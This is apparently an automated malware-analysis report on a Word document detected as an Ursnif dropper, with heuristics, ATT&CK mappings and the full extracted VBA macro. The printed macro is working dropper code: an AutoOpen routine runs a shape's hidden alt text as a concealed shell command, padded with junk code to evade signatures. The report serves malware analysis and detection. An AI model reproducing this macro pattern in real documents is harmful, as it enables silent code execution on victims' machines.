Verdict: MALICIOUS
Risk score: 202

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature 'Doc.Dropper.Ursnif-6864686-0', indicating the Ursnif family. The presence of an AutoOpen VBA macro and a critical 'Shell()' call strongly suggests that the macro is designed to execute arbitrary commands. This functionality is typically used to download and execute a secondary payload, aligning with the dropper behavior.
Heuristics (6)

- ClamAV: Doc.Dropper.Ursnif-6864686-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Ursnif-6864686-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3305 bytes | 94d51d658b8f52700bf1257daa4c5645af55473605f965497c8a4e4621ff50ff |
Preview script: first 1,000 lines of the extracted script (olevba concatenates the recovered modules; the second `Attribute VB_Name` line marks the start of the second module).

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Second module ("bsemeze"): holds the helper function and the AutoOpen entry point
Attribute VB_Name = "bsemeze"
Function KnUDnu()
' The Dim/assignment pairs below are never used; they pad the code to hinder signature matching
Dim cfiguc As Integer
Dim QFLer As Long
cfiguc = 6230 + 6623
Dim vEoTVi As Integer
Dim CVpSAqPs As Long
vEoTVi = 2492 + 1108
Dim KWOOc As Integer
Dim SUkNxO As Long
KWOOc = 5775 + 4640
Dim UaTuqQjx As Integer
Dim fjevifigi As Long
UaTuqQjx = 9846 + 4744
Dim jqyp As Integer
Dim fUqpf As Long
jqyp = 2538 + 1660
Dim xrefugyq As Integer
Dim IXgxhfx As Long
xrefugyq = 2978 + 5102
Dim wgNYvPob As Integer
Dim RbFwRk As Long
wgNYvPob = 4452 + 7232
Dim ijsamuUv As Integer
Dim GcqVV As Long
ijsamuUv = 1292 + 7618
Dim PRYHhQ As Integer
Dim dmox As Long
PRYHhQ = 5535 + 2628
mlaj = "zkumukaso"
Dim oErmSL As Integer
Dim YmQWTU As Long
oErmSL = 9619 + 3492
Dim dpib As Integer
Dim lgicek As Long
dpib = 5136 + 7907
Dim wdacux As Integer
Dim dvytuj As Long
wdacux = 2995 + 2545
Dim hcawepa As Integer
Dim rguduhun As Long
hcawepa = 2408 + 7373
Dim dpynyn As Integer
Dim BhFkeLRC As Long
dpynyn = 2069 + 4583
Dim MfgjPU As Integer
Dim dcabypuga As Long
MfgjPU = 6527 + 1340
Dim IzMlhudj As Integer
Dim JxCMKT As Long
IzMlhudj = 8083 + 4791
Dim pwifyko As Integer
Dim cfaqy As Long
pwifyko = 4321 + 2136
Dim xUDpN As Integer
Dim gfen As Long
xUDpN = 2295 + 5312
' Returns the document shape named "zkumukaso"; its alternative text carries the command
Set KnUDnu = ActiveDocument.Shapes(mlaj)
End Function
' AutoOpen runs automatically when the document is opened with macros enabled
Sub AutoOpen()
Dim gPbSsq As Integer
Dim hdikuqygalo As Long
gPbSsq = 7034 + 1157
Dim spydiri As Integer
Dim lxonujifiho As Long
spydiri = 9719 + 2954
Dim btyguj As Integer
Dim jvob As Long
btyguj = 1497 + 9311
Dim tbyfoqy As Integer
Dim JRPdViWp As Long
tbyfoqy = 2586 + 7494
Dim MgFJb As Integer
Dim nsebagigyp As Long
MgFJb = 4043 + 1942
Dim SoRRSrZ As Integer
Dim xjujebebu As Long
SoRRSrZ = 7964 + 4141
Set EbLXcZN = KnUDnu
Dim tpcQlgO As Integer
Dim xgonakisefy As Long
tpcQlgO = 8573 + 9366
Dim smud As Integer
Dim tnirixi As Long
smud = 2239 + 9409
Dim IDBNMc As Integer
Dim qRTEV As Long
IDBNMc = 8521 + 3009
' The Shell() call flagged by OLE_VBA_SHELL: the shape's alt text is executed as a hidden command
Interaction.Shell$ _
    EbLXcZN.AlternativeText, vbHide
Dim JvMOwuB As Integer
Dim rzoz As Long
JvMOwuB = 9343 + 1562
Dim dZRCQd As Integer
Dim mmhlXF As Long
dZRCQd = 7170 + 7870
Dim CTEayr As Integer
Dim URmzNN As Long
CTEayr = 4047 + 9243
Dim URMobP As Integer
Dim UmzEAOW As Long
URMobP = 5949 + 3947
Dim mnoke As Integer
Dim nduh As Long
mnoke = 9100 + 5588
Dim skMdW As Integer
Dim PqrQiCx As Long
skMdW = 8222 + 7336
Dim eTPYKua As Integer
Dim Rsyda As Long
eTPYKua = 3506 + 2957
Dim APTDW As Integer
Dim cGthdKW As Long
APTDW = 3570 + 6948
Dim ggeme As Integer
Dim qfoco As Long
ggeme = 9244 + 1662
Dim rlepilap As Integer
Dim sknKya As Long
rlepilap = 5267 + 9289
Dim HIyeQk As Integer
Dim DnkuXEo As Long
HIyeQk = 9524 + 4967
Dim OCCXpxx As Integer
Dim AZywqX As Long
OCCXpxx = 4605 + 9212
End Sub
```